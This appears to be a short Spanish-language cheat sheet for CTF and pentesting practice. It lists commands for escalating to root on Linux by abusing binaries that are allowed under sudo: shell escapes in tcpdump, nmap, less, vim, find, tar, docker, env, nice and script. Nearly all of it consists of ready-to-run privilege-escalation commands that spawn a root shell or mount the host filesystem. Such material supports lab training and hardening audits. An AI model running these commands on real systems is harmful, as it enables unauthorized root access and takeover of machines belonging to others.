System Tools Exploitation
Explotación de herramientas del sistema mal configuradas para escalar privilegios en sistemas Unix/Linux.
Estas técnicas no son teóricas: se han usado en múltiples CTFs reales y entornos reales, incluyendo plataformas como TryHackMe, HackTheBox y máquinas de VulnHub.
🧲 tcpdump
tcpdump
sudo tcpdump -i lo -w /dev/null -W 1 -G 1 -z /tmp/root.sh
🌐 nmap
nmap
# If interactive mode is enabled
sudo nmap --interactive
!sh
# With custom NSE script
sudo nmap --script=/tmp/root.nse
📖 less
, more
, man
less
, more
, man
# Open a file with less, then type:
!sh
✏️ vim
, vi
, nano
vim
, vi
, nano
:set shell=/bin/sh
:shell
🔍 find
find
sudo find . -exec /bin/sh \;
🗜️ tar
tar
sudo tar -cf archive.tar file --checkpoint=1 --checkpoint-action=exec=/bin/sh
🐳 docker
/ podman
docker
/ podman
sudo docker run -v /:/mnt --rm -it alpine chroot /mnt sh
🧬 env
, nice
, ionice
, flock
, script
env
, nice
, ionice
, flock
, script
sudo env /bin/sh
sudo nice /bin/sh
sudo ionice /bin/sh
sudo script /dev/null -c /bin/sh
Mas binarios en: https://gtfobins.github.io
Última actualización